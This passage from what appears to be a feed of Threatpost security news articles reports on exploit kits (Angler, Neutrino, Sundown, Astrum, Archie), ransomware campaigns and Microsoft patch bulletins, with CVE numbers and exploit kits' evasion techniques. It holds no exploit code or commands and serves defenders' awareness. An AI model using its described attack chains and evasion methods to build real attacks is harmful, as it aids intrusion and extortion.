different online games, locking downloadable content in an attempt to target younger computer users.\n\nResearchers at Bromium today said an unnamed compromised website is serving the malware. Victims are redirected by a Flash exploit to a site hosting the Angler exploit kit, and Angler drops the CryptoLocker variant.\n\n\u201cThe website is based on WordPress and could have been compromised by any one of the numerous WP exploits,\u201d wrote Vadim Kotov in an [advisory](<http://labs.bromium.com/2015/03/12/achievement-locked-new-crypto-ransomware-pwns-video-gamers/>) for Bromium. \u201cAdditionally, the URL where the malicious Flash file is hosted keeps changing.\u201d\n\nKotov said the attackers forgo typical iframe redirects and instead use a Flash file wrapped in an invisible div tag, likely in an attempt to evade detection. The malware proceeds through a number of checks for the presence of virtual machines or antivirus before dropping a Flash exploit for CVE-2015-0311 or an Internet Explorer exploit CVE-2013-2551.\n\nThe malware behaves like a typical CryptoLocker infection, presenting the victim with a banner explaining that files have been encrypted, and a ransom must be paid with Bitcoin in order for a decryption key to be sent to the victim. There are also instructions to make payments over Tor if the decryption site is not working.\n\nMore than 50 file extensions associated with video games are targeted by this variant, in addition to images, documents, iTunes files and more. A number of popular single-player games including Call of Duty, Minecraft, Half Life 2, Elder Scrolls, Skyrim, Assassin\u2019s Creed and others are affected, as are online games such as World of Warcraft, Day Z and League of Legends, as well as a number of EA Sports, Valve and Bethesda games. Steam gaming software is also in the crosshairs, Bromium said.\n\n\u201cEncrypting all these games demonstrates the evolution of crypto-ransomware as cybercriminal target new niches. Many young adults may not have any crucial documents or source code on their machine (even photographs are usually stored at Tumblr or Facebook), but surely most of them have a Steam account with a few games and an iTunes account full of music,\u201d Kotov wrote. \u201cNon gamers are also likely to be frustrated by these attacks if they lose their their personal data.\u201d\n\nSome of the files the variant goes after are often impossible to restore; those include user profile data, saved games, in-game maps and mods, Kotov wrote.\n\nThe Bromium advisory goes into more detail about command and control communication and encryption mechanisms. The experts advise gamers to back up their files on an external hard drive that is not connected to the Internet.\n\n\u201cAs more file categories are infected, a broader audience is affected,\u201d Kotov said. \u201cThe attackers are also getting better at incorporating BitCoin code directly into their projects, which isn\u2019t a good sign.\u201d\n", "cvss3": {}, "published": "2015-03-12T15:57:56", "type": "threatpost", "title": "CryptoLocker Variant Coming After Gamers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2551", "CVE-2015-0311"], "modified": "2015-04-13T17:19:09", "id": "THREATPOST:531D9E2E2960D83A1A334DF82AE3EA2E", "href": "https://threatpost.com/cryptolocker-variant-coming-after-gamers/111611/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:57", "description": "A new sort of hacktivism emerged last week when experts from Trustwave published new research revealing that attackers are using the Angler exploit kit and the Bedep Trojan in order to drive artificial views to politically controversial videos.\n\nThe motivation for the scheme, it appears, is to inflate the popularity of certain opinions by increasing the number of views reported by videos boasting those ideas. More specifically, the attackers are seeking to display these videos more prominently on the video aggregation site, Daily Motion. The use of botnets to artificially increase the number of views associated with a certain video is nothing new. However, Trustwave said this is the first time they have observed the tactic exploited in such a political fashion.\n\n[Trustwave\u2019s Rami Kogan says](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Bedep-trojan-malware-spread-by-the-Angler-exploit-kit-gets-political/>) he first observed the malware promoting pro-Russian content related to the Russo-Urkainian conflict, defending a recent state-sponsored trip to Norway, and announcing militant deaths in North Caucasus. Outside politics, Kogan believes that a similar but largely unrelated campaign is being used to inflate views for other videos on Daily Motion as well, including one announcing that U.S. actress and singer Anna Kendrick is writing a book and another debating which tech giant has the best headquarters. In both cases, attackers are simultaneously using Bedep to drive traffic to and increase revenue from online advertisements.\n\nThe attack begins with an infection driven by [the notorious and preeminent Angler exploit kit](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904>). The attackers are using a malicious iframe to redirect victims from a compromised tourism site. Angler then looks for evidence of installed antivirus software and for developer tools frequently used by security researchers in order [to avoid detection and analysis](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>). If it finds no defensive mechanisms in place, the kit installs the Bedep trojan onto its victim\u2019s machines.\n\nIn this case, Kogan observed angler exploiting CVE-2014-6332, an OleAut32.dll vulnerability, and CVE-2015-0313, an Adobe Flash Player vulnerability.\n\nOnce Bedep is loaded, the malware\u2019s command and control server drives the user to a specially crafted site that is overloaded with ad content in an attempt to increase the efficiency of the campaign\u2019s click-fraud efforts. Meanwhile, videos are loaded in a hidden desktop without the user\u2019s knowledge, promoting the scam\u2019s other mission: to increase the number of views for a given video in order to have it more prominently displayed on DailyMotion.\n\nStrangely, once the the click-fraud and view-inflation goals are achieved, the attackers seem to hand their victims off to other criminals by re-infecting their machines with either the Magnitude or Neutrino exploit kits.\n\n\u201cIt seems that the guys behind this particular C&C are trying to maximize their profit by selling traffic from compromised computers to other campaigners that seek to spread their own malware via Magnitude and Neutrino,\u201d Kogan writes. \u201cJust to make it clear: An already infected computer is visiting ads silently without the user\u2019s consent, and gets re-infected over and over again.\u201d\n\nOddly, all of the pro-Russian videos claim to have garnered right around 320,000 views. The clips also have no \u201cshares\u201d on Facebook, \u201cretweets\u201d on twitter or comments. Each has a graph embedded illustrating views from the last 24 hours.\n", "cvss3": {}, "published": "2015-05-05T08:00:41", "type": "threatpost", "title": "Angler Exploit Kit, Bedep Malware Inflating Video Views", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2015-0313"], "modified": "2015-05-06T18:39:00", "id": "THREATPOST:5322570E76BC4C08BD99F13E1B7F793F", "href": "https://threatpost.com/angler-exploit-kit-bedep-malware-inflating-video-views/112611/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:02", "description": "Attackers behind the Neutrino Exploit Kit didn\u2019t take long to co-op a recently patched Internet Explorer zero-day into its arsenal.\n\nResearchers claim the kit has been pushing CVE-2016-0189, a vulnerability that was reportedly used in targeted attacks on South Korean organizations earlier this year. Microsoft fixed the vulnerability, which affects Internet Explorer\u2019s scripting engines, [in May](<https://threatpost.com/microsoft-patches-jscript-vbscript-flaw-under-attack/117993/>).\n\nFour researchers with FireEye, Kenneth Johnson, Sai Omkar Vashisht, Yasir Khalid, and Dan Caselden, [explained Thursday](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) how attackers managed to leverage published source code for the exploit.\n\nThe researchers claim that the criminals behind Neutrino must have noticed when Theori, an Austin-based cybersecurity R&D startup, [developed a proof-of-concept exploit around the vulnerability in June](<http://theori.io/research/cve-2016-0189>).\n\n> Researchers at Theori published an analysis of Internet Explorer 11 VBScript Memory Corruption (with PoC exploit) <https://t.co/N6KsQbE30o>\n> \n> \u2014 Theori (@theori_io) [June 23, 2016](<https://twitter.com/theori_io/status/745781927131545601>)\n\nResearchers with Theori deconstructed the vulnerability following Microsoft\u2019s Patch Tuesday release that month and were able to compare the original to the patched programs, identify the root cause of the vulnerability and devise a [proof-of-concept](<https://github.com/theori-io/cve-2016-0189>) around it.\n\nFireEye researchers claim the exploit in Neutrino is exactly the same as the exploit that Theori came up with, suggesting the attackers simply borrowed the firm\u2019s PoC.\n\nThe bug can be exploited when a lock isn\u2019t put on an array before its worked on, something that can lead to an issue \u2013 and eventually memory corruption \u2013 if the array is accessed when another function is in the middle of working on it. The vulnerability can also be exploited to achieve remote code execution, assuming a victim using IE, lands on a site hosting the exploit.\n\nThe Neutrino kit works by embedding several exploits \u2013 including CVE-2016-0189 \u2013 into a Shockwave (.SWF) file that once run, scans the system in order to see which vulnerability to exploit.\n\nThe researcher Kafiene, who blogs at [Malware Don\u2019t Need Coffee](<http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html>), discussed earlier this week how he\u2019d seen the CVE integrated into Neutrino, even posting a screenshot of the kit, dropping Locky, complete with its list of exploits,\n\nIn recent months a handful of malvertising and ransomware campaigns have pivoted towards kits like RIG and Neutrino [in the wake of dying, if not already dead kits](<https://threatpost.com/nuclear-angler-exploit-kit-activity-has-disappeared/118842/>) like Angler and Nuclear. In a report last month Proofpoint said that Neutrino dropping CryptXXX accounted for 75 percent of its observed exploit kit traffic while another 10 percent combined of Neutrino and Magnitude was dropping Cerber. While they were successful for a long stretch of time, activity from Nuclear and Angler has been basically non-existent since the end of April and the beginning of June, respectively, Kafiene told Threatpost last month.\n", "cvss3": {}, "published": "2016-07-15T16:16:39", "type": "threatpost", "title": "Neutrino EK Spotted Leveraging Patched IE Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189", "CVE-2017-11882"], "modified": "2016-07-15T20:25:52", "id": "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "href": "https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:52", "description": "A busy Microsoft Patch Tuesday arrived today with an extra sense of urgency and a complication.\n\nAmong 14 bulletins, four of which are rated critical by Microsoft, is a patch for the [OLE zero-day vulnerability](<http://threatpost.com/attackers-exploiting-windows-ole-zero-day-vulnerability/108958>) being used in a number of targeted attacks. The zero-day is being spread via email messages containing malicious Office file attachments. The disclosure, the second against OLE since Oct. 14, was partially addressed when Microsoft issued a [FixIt tool](<https://support.microsoft.com/kb/3010060>) as a temporary mitigation.\n\nThe OLE vulnerability affected all supported releases of Windows and allowed attackers to remotely control infected computers and execute code. The announcement followed a report by iSIGHT Partners revealing that the [Sandworm APT group](<https://threatpost.com/sandworm-apt-team-found-using-windows-zero-day-vulnerability/108815>) was exploiting another hole in OLE to attack government agencies and energy utilities.\n\nOLE, or Microsoft Windows Object Linking and Embedding, allows for embedding and linking to documents and other objects.\n\n[MS14-064](<https://technet.microsoft.com/en-us/library/security/MS14-064>) addresses both vulnerabilities in question, [CVE-2014-6332](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) and [CVE-2014-6352](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352>). The first CVE occurs when Internet Explorer improperly access objects in memory, Microsoft said. The second patch modifies the way Windows validates the use of memory when OLE objects are accessed, Microsoft said.\n\nThe use of Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET) was also recommended as a temporary stopgap. Microsoft on Monday released [EMET 5.1](<http://support.microsoft.com/kb/3015976#Changes>), and updated a number of the mitigations available, including the resolution of a race condition in the Mandatory ASLR mitigation and the hardening of several other mitigations against reported bypasses.\n\nThe most important updates, however, have to do with compatibility with a number of ubiquitous applications, including Internet Explorer, Adobe Reader and Flash, and Mozilla Firefox.\n\nIn fact, Microsoft recommends that EMET 5.0 users upgrade to 5.1 immediately before proceeding with the application of today\u2019s patches.\n\n\u201cIf you are using Internet Explorer 11, either on Windows 7 or Windows 8.1, and have deployed EMET 5.0, it is particularly important to install EMET 5.1 as compatibility issues were discovered with the November Internet Explorer security update and the EAF+ mitigation,\u201d Microsoft said in an [advisory](<http://blogs.technet.com/b/srd/archive/2014/11/10/emet-5-1-is-available.aspx>). \u201cAlternatively, you can temporarily disable EAF+ on EMET 5.0.\u201d\n\nAs is becoming the norm, Microsoft also released a cumulative update for IE. Today\u2019s bulletin, [MS14-065](<https://technet.microsoft.com/en-us/library/security/MS14-065>), patches 17 vulnerabilities, many of which allow remote code execution. The update is rated critical going back to IE 6.\n\n\u201cThe security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory, by adding additional permission validations to Internet Explorer, and by helping to ensure that affected versions of Internet Explorer properly implement the ASLR security feature,\u201d Microsoft said.\n\nMicrosoft also patched a remote code execution vulnerability in Microsoft Secure Channel, or Schannel, a Windows encryption security package used for SSL and TLS connections. [MS14-066](<https://technet.microsoft.com/library/security/MS14-066>) patches an issue in the way Schannel processes specially crafted packets, Microsoft said.\n\n\u201cThe fixes in this bulletin are the result of an internal code review at Microsoft that uncovered a number of memory corruption issues in Schannel in both server and client roles,\u201d said Qualys CTO Wolfgang Kandek. \u201cThe vulnerabilities are private as they were found by Microsoft internally and while Microsoft considers it technically challenging to code an exploit it is only a matter of time and resources, it is prudent to install this bulletin in your next patch cycle.\u201d\n\n[MS14-067](<https://technet.microsoft.com/library/security/MS14-067>) is the final bulletin ranked critical by Microsoft. The vulnerability can be exploited by a malicious website designed to invoke Microsoft XML Core Services through IE, Microsoft said. MSXML improperly parses XML content, which can then in turn corrupt the system state and enable remote code execution, Microsoft said.\n\nOne bulletin rated important by Microsoft is MS14-069, which patches vulnerabilities in Microsoft Word 2007 and allows for remote code execution. Because it\u2019s limited to Office 2007 and cannot be automatically exploited remotely and requires user action, Microsoft rated it important.\n\n\u201cThe attack scenario here is a malicious document that the attacker prepares to exploit the vulnerability. Attackers then send the document directly or a link to their targets and use social engineering techniques, such as legitimate sounding file names and content descriptions that are likely interest the targets in question,\u201d Kandek said. \u201cIf you run newer versions of Microsoft Office you are not vulnerable, but users of Office 2007 should place high priority on this bulletin.\u201d\n\nThe remaining bulletins are all rated important by Microsoft:\n\n * [MS14-070](<https://technet.microsoft.com/library/security/MS14-070>) is an elevation of privilege vulnerability in TCP/IP\n * [MS14-071](<https://technet.microsoft.com/library/security/MS14-071>) is an elevation of privilege vulnerability in Windows Audio Service\n * [MS14-072](<https://technet.microsoft.com/library/security/MS14-072>) is an elevation of privilege vulnerability in the .NET framework\n * [MS14-073](<https://technet.microsoft.com/library/security/MS14-073>) is an elevation of privilege vulnerability in SharePoint Foundation\n * [MS14-074](<https://technet.microsoft.com/library/security/MS14-074>) is a security feature bypass in Remote Desktop Protocol\n * [MS14-076](<https://technet.microsoft.com/library/security/MS14-076>) is a security feature bypass in Internet Information Services\n * [MS14-077](<https://technet.microsoft.com/library/security/MS14-077>) is an information disclosure vulnerability in Active Directory Federation Services\n * [MS14-078](<https://technet.microsoft.com/library/security/MS14-078>) is an elevation of privilege vulnerability in IME (Japanese)\n", "cvss3": {}, "published": "2014-11-11T14:07:38", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2014-6352", "CVE-2017-11882"], "modified": "2014-11-12T12:18:03", "id": "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "href": "https://threatpost.com/microsoft-patches-ole-zero-day-recommends-emet-5-1-before-applying-ie-patches/109302/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A ransomware attack that closed off access to personal and shared drives at University College London last week has been linked to a malvertising campaign spreading Mole, a variant of CryptoMix ransomware.\n\nKafeine, a white-hat who works for Proofpoint and is known for his research into exploit kits, said in a [report](<https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware>) published today that the group behind AdGholas is responsible. AdGholas are well known malvertising purveyors who have [used steganography in the past to conceal attacks](<https://threatpost.com/adgholas-malvertising-campaign-leveraged-steganography-filtering/119571/>). In this case, the attacks used the Astrum Exploit Kit to spread the malware.\n\nUniversity College London, meanwhile, said today that [all services have been returned to normal](<http://www.ucl.ac.uk/isd/news/isd-news/jun2017/ucl-wide-ransomware-attack-14062017>). As of Friday, personal storage and shared drives had been restored, and yesterday, write-access to the remaining shared drives was also restored.\n\nThe infection, the university said, was contained by last Thursday and that it was continuing to look into the root cause. Initially, officials said the attack started with a phishing email, but later reversed course and said the attack was web-based. Officials also said that services should be able to be restored from backup, sparing them the need to pay a ransom.\n\nA dozen local and shared drives were infected, and the school initially called it a \u201czero-day attack.\u201d\n\n\u201cOur antivirus software is up to date and we are working with anti-virus suppliers to pass on details of the infection so that they are aware of the incident,\u201d officials said last week. \u201cWe cannot currently confirm the ransomware that was deployed.\u201d\n\nProofpoint said AdGholas\u2019 use of ransomware in this attack is a departure from its normal tactic of spreading banking malware. Kafeine said the attack went beyond just UCL to other high-profile sites.\n\nAfter ruling out other exploit kits and ransomware based on available forensics, Proofpoint investigated the possibility of the involvement of AdGholas and its use of Astrum to spread malware. One of the IP addresses found in the attack was a Mole command and control server; some malware samples contacting this IP had been submitted to VirusTotal and were consistent with a known Astrum payload.\n\n\u201cAt that stage, we were almost convinced the events were tied to AdGholas/Astrum EK activity,\u201d Kafeine wrote. \u201cWe confirmed this, however, via an HTTPS connection common to the compromised host avia-book[.]com.\u201d\n\nThe compromised domain was used in a number of malvertising campaigns across Europe and Asia, and Kafeine said all the compromised hosts also contacted the current Astrum command and control IP address, which offers full HTTPS support, Proofpoint said.\n\n\u201cAstrum tried HTTPS between March 30 and April 4, 2017, before adopting it permanently at the end of May, Kafeine said, identifying a number of vulnerabilities exploit by the kit: CVE-2016-0189, CVE-2016-1019, and CVE-2016-4117. \u201cThe introduction of Diffie-Hellman suggests that there might be a new exploit the actors are trying to hide in this chain. Obtaining the patch state of the compromised hosts would help rule out this possibility.\u201d\n\nThe exploit kit was spreading Mole ransomware on two days, June 14 and 15, in the U.K. and United States, while continuing to spread banking malware elsewhere.\n\nMole encrypts files and demands 0.5 Bitcoin to receive a decryption key that unlocks scrambled data.\n\n\u201c[AdGholas malvertising](<https://threatpost.com/microsoft-shuts-down-zero-day-used-in-adgholas-malvertising-campaigns/120618/>) redirecting to the Astrum Exploit Kit is the most evolved blind mass infection chain known today,\u201d Kafeine wrote. \u201cFull HTTPS, heavy smart filtering, domain shadowing, Diffie-Hellman, and perfect knowledge of how the advertising industry operates allow these threat actors to lure large agencies to bring them high volumes of traffic from high-value website and targets.\u201d\n", "cvss3": {}, "published": "2017-06-20T14:27:43", "type": "threatpost", "title": "UCL Ransomware Linked to AdGholas Malvertising Group", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2017-06-20T18:27:43", "id": "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "href": "https://threatpost.com/university-college-london-ransomware-linked-to-adgholas-malvertising-group/126405/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:15", "description": "Six months of relative quiet around exploit kits recently changed when a public proof-of-concept attack disclosed by a Texas startup was integrated into the Sundown Exploit Kit.\n\nThe [proof-of-concept exploit](<https://github.com/theori-io/chakra-2016-11>) was developed by Theori, a research and development firm in Austin, which opened its doors last spring. The PoC targets two vulnerabilities, CVE-2016-7200 and CVE-2016-7201, in Microsoft Edge that were [patched in November](<https://threatpost.com/microsoft-patches-zero-day-disclosed-by-google/121851/>) in [MS16-129](<https://technet.microsoft.com/library/security/MS16-129>) and privately disclosed to Microsoft by Google Project Zero researcher Natalie Silvanovich.\n\nFrench researcher Kafeine said on Saturday that he had spotted [weaponized versions of the Theori exploits](<http://malware.dontneedcoffee.com/2017/01/CVE-2016-7200-7201.html>) in Sundown two days after they were made public. The payload is most likely the Zloader DLL injector, but Sundown has also moved other malware in the past including banking Trojans such as Zeus Panda and Dreambot, and even Bitcoin mining software. Kafeine said this is the first significant exploit kit activity he\u2019s seen in six months.\n\nThis is the [second time](<http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html>) a Theori proof-of-concept exploit has ended up in an exploit kit, Kafeine said, harkening back to CVE-2016-0189, which was patched in May by Microsoft and yet eventually found its way into Neutrino, RIG, Sundown and Magnitude.\n\nKafeine said he expects other exploit kits to quickly integrate this attack as well, but activity could be slowed by Christmas and New Year holidays in the West, and the recently concluded Russian holiday season.\n\nA request for comment from researchers at Theori was not returned in time for publication. In the Readme for the exploits posted to Github, Theori said its PoC was tested on the latest version of Edge running on Windows 10. The vulnerabilities are in the Chakra JavaScript engine developed for Microsoft in Internet Explorer 9. The Theori exploits trigger information leak and type confusion vulnerabilities in the browser, leading to remote code execution.\n\nThe bugs were patched Nov. 8 by Microsoft in a cumulative update for the Edge browser; Microsoft characterized them as memory corruption flaws and rated them both critical for Windows clients and moderate for Windows server. Microsoft described potential attacks in its security bulletin:\n\n\u201cIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked \u2018safe for initialization\u2019 in an application or Microsoft Office document that hosts the Edge rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\u201d\n\nExploit kits are still in the wild, spreading everything from ransomware to click-fraud malware. The integration of new exploits, however, has slowed significantly since the erasure of Angler and other popular kits from the underground. Angler\u2019s disappearance coincided with the June arrests of 50 people in Russia allegedly connected to the [development and distribution of the Lurk Trojan](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>). Researchers at Kaspersky Lab who [investigated the infrastructure supporting Lurk](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) said there was little doubt that the criminals behind Lurk were also responsible for Angler\u2019s constant development and profit-making.\n\nSince the end of the summer, however, exploit kit development has all but ended while attackers have returned to large-scale spamming campaigns and a resurgence of macro malware to move attacks along.\n\n\u201cRegarding the why, I don\u2019t know for sure,\u201d Kafeine said. \u201cEither it\u2019s harder to code those, [or] those who were providing fully working exploits (for Angler for instance) are not anymore into this.\n\n\u201cI think [exploit kits] have not been so far behind in years.\u201d\n", "cvss3": {}, "published": "2017-01-10T11:28:20", "type": "threatpost", "title": "Two New Edge Exploits Integrated into Sundown Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189", "CVE-2016-7200", "CVE-2016-7201"], "modified": "2017-01-10T17:44:32", "id": "THREATPOST:25D046C31909BDD0D33A9F68E8796B5E", "href": "https://threatpost.com/two-new-edge-exploits-integrated-into-sundown-exploit-kit/122974/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:21", "description": "Microsoft released a hefty load of security bulletins today, which included a patch for a JScript and VBScript scripting engine vulnerability being publicly exploited.\n\nThe flaw is addressed in its own bulletin, [MS16-053](<https://technet.microsoft.com/library/security/MS16-053>), but users need to pay attention to, and apply [MS16-051](<https://technet.microsoft.com/library/security/MS16-051>) as well since the attack vector is through Internet Explorer.\n\nMS16-051 addresses the issue in IE 9, 10 and 11; MS16-053 patches the flaw in IE 7 and earlier supported versions of the browser.\n\nThe flaw, CVE-2016-0189, is one of two memory corruption vulnerabilities in the scripting engines. Both enable arbitrary code execution if a victim, via IE, lands on an attacker\u2019s site hosting the exploit; CVE-2016-0187 is the other flaw in the scripting engines patched today. Microsoft said the flaws exist because of how JScript and VBScript handle objects in memory in IE. VBScript 5.7 is vulnerable on Windows Vista, Windows Server 2008 and the Server Core installation option, while JScript 5.8 and VBScript 5.8 are vulnerable on Windows Server 2008 R2 for x64 Systems Service Pack 1 are vulnerable on the Server Core installation only.\n\nMicrosoft said that restricting access to VBScript.dll and JScript.dll would be effective and temporary workarounds.\n\nThe IE bulletin, meanwhile, patches three other vulnerabilities, including a bypass of Device Guard. The User Mode Code Integrity component improperly validates code integrity, Microsoft said, allowing an attacker to execute unsigned code that should be blocked.\n\nThere\u2019s also a fix for a separate memory corruption issue in the browser allowing for arbitrary code execution, and an information disclosure flaw caused by the way IE handles file access permissions. An attacker could exploit this flaw too disclose the contents of files stored on the compromised machine.\n\nIn all, Microsoft pushed out 17 bulletins today, eight of those it rated critical, including a bulletin covering vulnerabilities in Flash Player, [MS16-064](<https://technet.microsoft.com/library/security/MS16-064>), patching two dozen remote code execution flaws.\n\nMicrosoft also patched four remote code execution vulnerabilities in its Edge browser in [MS16-052](<https://technet.microsoft.com/library/security/MS16-052>). Three of the flaws are in the Chakra JavaScript engine in the browser, none of which are publicly disclosed nor exploited. The remaining flaw occurs because of how Edge accesses objects in memory, leading to corruption and arbitrary code execution.\n\nAnother bulletin worth watching is [MS16-054](<https://technet.microsoft.com/en-us/library/security/ms16-054.aspx>), which includes patches for four remote code execution flaws in Microsoft Office. In addition to Office, Microsoft cautioned that versions of Word going back to Office 2007 are vulnerable to CVE-2016-0198, one of three memory corruption flaws addressed in this bulletin. Users would have to be enticed to open a malicious Word document to exploit this flaw, Microsoft said. The remaining vulnerability is in Office Graphics, specifically in the way the Windows font library handles specially crafted embedded fonts. An attacker could exploit this over the web, or share the file with a user via email or IM, for example.\n\nMicrosoft also patched a critical remote code execution flaw in Windows Journal in [MS16-056](<https://technet.microsoft.com/en-us/library/security/ms16-056.aspx>). An attacker could craft a malicious Journal file and trick the user into opening it in Windows Journal. The flaw affects every supported version of Windows.\n\n[MS16-055](<https://technet.microsoft.com/en-us/library/security/ms16-055.aspx>), meanwhile, patches five flaws in Microsoft Graphics Component, including three remote code execution flaws in Windows Imaging Component, Direct3D and Windows GDI component. The bulletin also includes two patches for information disclosure bugs in Windows GDI.\n\nThe final critical bulletin, [MS16-057](<https://technet.microsoft.com/en-us/library/security/ms16-057.aspx>), patches one remote code execution bug in Windows Shell.\n\nThe remaining bulletins were rated important by Microsoft:\n\n * [MS16-058](<https://technet.microsoft.com/en-us/library/security/ms16-058.aspx>) patches one remote code execution vulnerability in Windows IIS; the bug is rated important because an attacker would need local access to exploit the issue.\n * [MS16-059](<https://technet.microsoft.com/en-us/library/security/ms16-059.aspx>) patches a remote code execution flaw in Windows Media Center that could be exploited via a malicious .mcl link.\n * [MS16-060](<https://technet.microsoft.com/en-us/library/security/ms16-060.aspx>) patches a vulnerability in Windows kernel that could be exploited by an attacker with local access installing a crafted, malicious application.\n * [MS16-061](<https://technet.microsoft.com/en-us/library/security/ms16-061.aspx>) patches a elevation of privilege flaw in Windows RPC if an attacker makes a malformed RPC request to the host machine.\n * [MS16-062](<https://technet.microsoft.com/en-us/library/security/ms16-062.aspx>) patches multiple vulnerabilities in Windows Kernel-Mode drivers, including a privilege escalation issue for an attacker with local access.\n * [MS16-065](<https://technet.microsoft.com/en-us/library/security/ms16-065.aspx>) patches an information disclosure flaw in the .NET Framework. An attacker would need to inject an attack into the target secure channel and then carry out a man-in-the-middle attack, Microsoft said.\n * [MS16-066](<https://technet.microsoft.com/en-us/library/security/ms16-066.aspx>) patches a Windows Virtual Secure Mode bypass vulnerability.\n * [MS16-067](<https://technet.microsoft.com/en-us/library/security/ms16-067.aspx>) patches a Windows Volume Manager Driver information disclosure flaw that can be exploited if a USB mounted over RDP via RemoteFX is not correctly configured to the user\u2019s session.\n", "cvss3": {}, "published": "2016-05-10T15:03:31", "type": "threatpost", "title": "May 2016 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189", "CVE-2016-0198"], "modified": "2016-05-11T17:44:09", "id": "THREATPOST:E894CC01A01E2286CFFF1609A00DE5BB", "href": "https://threatpost.com/microsoft-patches-jscript-vbscript-flaw-under-attack/117993/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:09", "description": "A relatively new exploit kit that borrows modules copied from the Metasploit Framework and exploits any older versions of Adobe Flash, Reader and, Silverlight the user may be using has begun to make the rounds.\n\nJaime Blasco, the director of AlienVault Labs dug deeper into kit, known as Archie, on the [company\u2019s blog yesterday](<http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit>).\n\nFirst discovered by [EmergingThreats in August](<http://emergingthreats.net/daily-ruleset-update-summary-08132014/>), Archie is apparently one of the more basic exploit kits on the market.\n\n\u201cWhen the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information,\u201d Blasco says, regarding Archie\u2019s functionality.\n\nIn addition to Flash and Reader, the kit also checks victims\u2019 machines to see if its running a 64-bit version of Internet Explorer.\n\nIf caught running an outdated version of Flash it will load one of two exploits, including CVE-2014-0497, a zero day that hackers used to deploy password-grabbing Trojans in China [back in February](<http://threatpost.com/details-emerge-on-latest-adobe-flash-zero-day-exploit/104068>). Hackers used the other Flash exploit the kit employs, CVE-2014-0515, in attacks against Syrians [in April](<http://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726>).\n\nThe IE vulnerability it checks for, [CVE-2013-2551](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities>), is the same use-after-free memory corruption vulnerability that VUPEN dug up at Pwn2Own 2013.\n\nThe Silverlight vulnerability Archie exploits is an old one as well. Despite being patched in March 2013, the kit exploits a vulnerability, [CVE-2013-0074](<threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), that targets Silverlight 5 and opens up systems running it up to remote code execution.\n\n\u201cArchie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them,\u201d Blasco wrote.\n\nThe shellcode then kickstarts a basic download and execute payload, which Blasco said comes from the same IP address as one being used for a .NET click fraud bot.\n\nA bevy of new exploit kits have been circulating in the 10 or so months since authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the Blackhole Exploit Kit\u2019s creator. [Blackhole and Cool](<http://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034>), another Exploit Kit assumed to have been crafted by Paunch, dissolved soon after.\n\nMalicious ads on Yahoo were found linking European users to one of those kits, Magnitude, in January while this summer, men\u2019s lifestyle site AskMen.com was spotted directing users to the 